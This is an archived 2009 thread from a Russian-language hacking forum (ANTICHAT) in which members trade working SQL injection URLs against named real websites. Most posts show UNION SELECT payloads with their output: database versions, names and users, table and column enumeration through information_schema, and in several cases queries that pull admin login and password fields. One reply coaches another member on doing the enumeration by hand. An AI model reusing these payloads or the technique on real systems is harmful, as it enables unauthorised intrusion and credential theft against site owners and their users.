HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.06.2009, 21:47
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
По умолчанию

http://www.sewmach.com.ua/cat.php?cat=23&art=-114++union+select+1,2,concat(user_login,0x3a,user_ passw),4,5,6+from+auth_users

Database Version: 5.0.67-log
Database name: sew-mach
User name: sew-mach@localhost

Линия красоты

Код:
http://www.beauty-line.com.ua/cat.php?nom=cat&firm=-5+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4
Database Version: 4.1.22
Database name: gezanne
User name: gezanne@localhost

Последний раз редактировалось Rubaka; 21.06.2009 в 21:57..
 
Ответить с цитированием

  #2  
Старый 21.06.2009, 22:17
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.moe.com.np/terms.php?id=1'+union+select+1,2,3,4,5,6,7,user(), 9,10,11,12,13,14,15+--+

moecom_moe@localhost
 
Ответить с цитированием

  #3  
Старый 21.06.2009, 22:22
ciberx
Новичок
Регистрация: 04.12.2007
Сообщений: 1
Провел на форуме:
8570

Репутация: 5
По умолчанию

http://onlinefoto.com.ua/backlinks/links.php?id=3092'

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,2/*

БД
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

Ток чет с таблицами никак не получается...(

Последний раз редактировалось ciberx; 21.06.2009 в 22:30..
 
Ответить с цитированием

  #4  
Старый 21.06.2009, 22:29
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от ciberx  
http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SEL ECT+1,CONCAT(0x7873716C696E6A626567696E,Version(), 0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C 696E6A656E64)+LIMIT+1,1/*

БД
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

Ток чет с таблицами никак не получается...(

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,group_concat(tab le_name)+from+information_schema.tables+group+by+t able_schema+limit+2,1/*

а ты крути руками а не SIPT'om
 
Ответить с цитированием

  #5  
Старый 21.06.2009, 22:29
--StraNger--
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме:
404716

Репутация: 145
По умолчанию

Код:
http://www.bintec.ru/?mod=SiteNews&act=7&id=-1+union+select+1,concat_ws(0x3a,login,PASSWORD),3,4,5,6+from+ssp_AdminSet--+
 
Ответить с цитированием

  #6  
Старый 21.06.2009, 23:38
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

PR 5
http://mahatma.com/php/showNews.php?newsid=67&linkid=16+and+substring(ver sion(),1,1)=x



Version : 5.0.81-community
Database : mahatmam_comdb
User : mahatmam_mahatma@localhost
Os : pc-linux-gnu



и сиптом все получается, главное запрос составить как надо...

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SELECT+1,AES_DECRYPT(AES_ ENCRYPT(CONCAT(0x7873716C696E6A626567696E,TABLE_NA ME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C6 96E6A656E64),0x71),0x71)+FROM+INFORMATION_SCHEMA.T ABLES+LIMIT+45,1/*

16 :In database information_schema found table USER_PRIVILEGES
1 : GRANTEE
2 : TABLE_CATALOG
3 : PRIVILEGE_TYPE
4 : IS_GRANTABLE
17 :In database information_schema found table VIEWS
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : VIEW_DEFINITION
5 : CHECK_OPTION
6 : IS_UPDATABLE
7 : DEFINER
8 : SECURITY_TYPE
18 :In database onlinefoto found table replinks
1 : id
2 : linkdata
19 :In database onlinefoto found table sph_admins
1 : admin_id
2 : login
3 : password
bla bla bla

Последний раз редактировалось Gorev; 21.06.2009 в 23:41..
 
Ответить с цитированием

  #7  
Старый 21.06.2009, 23:45
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.nirmaljoshi.com.np/jokes.php?id=-1'+union+select+1,2,3,unhex(hex(concat_ws(0x3a,use r(),database(),version()))),5,6+--+


siddhant123_data@82.197.131.19:siddhant123_data:4. 1.18-log

####################################
http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,version(),4,5,6,7--

5.0.77-community


admin:

http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,group_concat(column_name),4,5,6 ,7+from+information_schema.columns+where+table_nam e=0x75736572--

Последний раз редактировалось HAXTA4OK; 22.06.2009 в 00:05..
 
Ответить с цитированием

  #8  
Старый 22.06.2009, 01:25
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.russellmania.com/index.php?id=35&dvd_id=-1137+union+select+version()--
Database Version: 5.0.77-community
Database name: mania_cms
User name: mania_user@localhost
 
Ответить с цитированием

  #9  
Старый 22.06.2009, 01:30
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.milnerton.co.za/details.php?id=2965++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+limit+1,1/*
version():5.0.38-Debian_2-log
database():milnertondb
user():34_milnertondb@localhost

Есть таблица prop_admin
__
Код:
http://www.rvtech.co.za/NewsView.php?Id=1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5+limit+1,1/*
version():5.0.32-Debian_7etch10
database():rvtech_db1
user():rvtech_1@dedi185.nur4.host-h.net

Есть таблица User

Последний раз редактировалось M.W.N.N.; 22.06.2009 в 01:33..
 
Ответить с цитированием

  #10  
Старый 22.06.2009, 15:59
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

Код:
http://www.clownage.fr/paroles.php?id=-9+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x636C5F6E657773+/*+
Код:
http://www.sko-meteo.kz/view_date.php?date=2008-03'+UnIoN+SeLecT+1,table_name,3,4,5,6,7,8+from+information_schema.tables+--+
Код:
http://www.granjard.fr/ameublement.php?id=-13+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,password),7+from+user+/*+
Код:
http://psr-quad.com/fiche_produit.php?proid=-520+UnIon+SeLect+1,2,3,4,5,concat_ws(0x3a3a,login,password),7,8,9,10,11,12,13,14+from+user+--+
PS Где тут админки ???
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.